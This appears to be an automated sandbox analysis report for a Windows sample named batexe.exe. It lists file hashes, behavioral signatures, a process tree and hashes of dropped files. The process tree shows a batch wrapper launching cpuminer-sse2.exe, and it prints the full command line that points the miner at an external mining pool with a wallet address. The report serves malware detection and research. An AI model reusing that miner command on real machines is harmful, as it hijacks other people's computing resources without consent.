Analysis
-
max time kernel
296s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
17/02/2024, 07:03
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2320 b2e.exe 2328 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2328 cpuminer-sse2.exe 2328 cpuminer-sse2.exe 2328 cpuminer-sse2.exe 2328 cpuminer-sse2.exe 2328 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4192-6-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4192 wrote to memory of 2320 4192 batexe.exe 74 PID 4192 wrote to memory of 2320 4192 batexe.exe 74 PID 4192 wrote to memory of 2320 4192 batexe.exe 74 PID 2320 wrote to memory of 2268 2320 b2e.exe 75 PID 2320 wrote to memory of 2268 2320 b2e.exe 75 PID 2320 wrote to memory of 2268 2320 b2e.exe 75 PID 2268 wrote to memory of 2328 2268 cmd.exe 78 PID 2268 wrote to memory of 2328 2268 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\2110.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\2110.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2110.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\26DC.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2328
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD57b9e19cbeef48d1436f80636d98f1e29
SHA1211ab3ec2dbf56621bfa6e7b4af51f6d59ed7e22
SHA256ab3065d4cd6d2916257227617fba70a92bdb7b65f474d9a3b5a7910c6791775d
SHA512cd561dbc1747d3f5e1a799a1d6f13d71150e273835ecfd1f84b00e742b04a23b41daf83db404ef527c1531f665bd6e74a4fc62bc84759208b958a4803063bdae
-
Filesize
1.6MB
MD51e9446ffe80055b0d0681a975585d4f2
SHA1e2b13091250549c39e6156044d3d826cfa7cc936
SHA2566a5e65eb48e3c9f4a594a64b60d57436418cec87e75c9cf93d55746ef761e17c
SHA512fc3ca72c1070ad153cb9f99b6a1665efb80d83005f575d70437af8d87164bff1c689305570feb80d84889a31fdc0ee1b375576fa9594ee303c2ab0776bf0e2fa
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
685KB
MD5c3eda1edc6e4b582325684dcdb9ea991
SHA1c4dbffc6b0c583b24f650c7e7e2ded05be401f4f
SHA256058ba3384a2e251ee07a69b0850ec304888ee54a6796cae7bdabe8d0e1692d05
SHA5127564dd6e836fd3f3ca3c4537a838807c17cee041d116bf511a667c848979d1340179dbfd121dec6ea353776dc2c82f8b03c1636994a4a0831b154e494fb130d8
-
Filesize
890KB
MD5aafcc702d92248798ee7d3653e8b3c73
SHA1414844611d11f082f7087842a960bd28c5c453a8
SHA256441c106e585aee5afb5ee45378a2a4ffc5e6c2ee53afbe027ad757437068e86d
SHA512df4094914f7adc679e7af136f8e8b1c2191acaf47e20d8a4e7f034e67b926307899352dfa944967723af85f40df424f88badf1d78a310b2c631a65acef0b3151
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
692KB
MD52fd423a593129abc1e5935251d06a726
SHA13a2f032e2f4e8573ce985840b53db09706b3c16e
SHA2566d203e4f0ddb333d9a9b9336dcb593cfef8fcab1653e38cd14ae5cd0213f7160
SHA512fb54a16eb5333ff719bd03bf1f7f7e06569357ef161695142a8d0ac7bd3fb9e6de967c75d83d6a3d38d35a5e8048a6231dae56870b10c41f9b2a0ff4cbf55caf
-
Filesize
430KB
MD54b8fc13fa9edc9d8cbcf2b5c3dab96bc
SHA19c6ff9a2bc79a47e63e0b441911b699dd54b46e4
SHA256769237952044e06a9a8ef73794c8f36669800c9852e9f52ff3d2bfc4bbcbff1a
SHA51239d2882145d212d59052f00de0f23dd0549107052378499dc10727e6d6fb47eded57aa8eec711d9f988d1c2ccdf63782b5798e379ab8ccda0b9d262bb0badafb
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
528KB
MD57ae426a8d6143b4af89d27269e3e4e10
SHA11bf4be466fb6a5166a432b2d7034a2a08619d0ab
SHA256e7d06d2d901c4002fc91676dedca8551a6190d6d914d80ad9686302de37a205b
SHA512c06a874e6bd61c477eae7237d9ba52072ee3e89192734d8cbb98e0deb7e44033a17c7673f9a4e8f9902db8d6b0c770c8f5482a574aa174ff834e87a414ac4279
-
Filesize
640KB
MD51bff0defeeb9f4bc5cf01e916a8d1379
SHA1bdb668928be0a339e01e3aeeac813fd26b44b950
SHA256d7f49e1dd346940049b753b856759608013f611624432c7ea57b0872239d35c0
SHA512edb3e22bb4d6f3376d73ccd538a61292c5a086fc8ef9b8038b663c93d9ec991bdca297e3c6febb9d18fd16f5304e4fa532d603c68739598f4b65af320ffb3878
-
Filesize
499KB
MD57048256c03822364a0cf903db953398e
SHA1bd6b9b7b9529daf8aa5893c9cc51b6a559b4e5ed
SHA25696be8a26f62a9eac661deba00e0558d312fe40d1d23de332749521b59407944a
SHA51298a0d829d66bac8292c81f8960b36d37d95f35456dc4f6ed3dd4ec330e0923d3783cddfdc68fbff46a7d934f6509d5d6ea81ae8818e29bb81f64edb7897b6ffa
-
Filesize
614KB
MD50b8875c486c59934c719d113f10eb784
SHA11bba930d53ddde3054f940a8db3b4411a1901081
SHA256d536530e94c5e59b0ef43149931ea5d002a5b2814de975f5ffb92514821b1879
SHA512f847604e88d73e9c04c967e5f3e780a9d2dbf8d7694ef3b5946fb9faba1194a44270bebc0b13215df5cc2ae030a53c9f522c421681864a6df1b2d9efe18f2e29
-
Filesize
603KB
MD5ba8bc4eaa87c70028b3203a229884cb1
SHA114fcea3133576b11319fe29334d216d4678df1a1
SHA25642dcaa5252a8d2a3b42cf240902eb2250278904eb17b2e2d56fe4c08a0c2f059
SHA512520676e9cd2a02f465b74ed163212f1a433a0d04d6fe2f086bfd3def82e26375b11908e4d2ba6e705c1587aad713c14f12d5ad74d75902c2771fd6dd7d07fbbc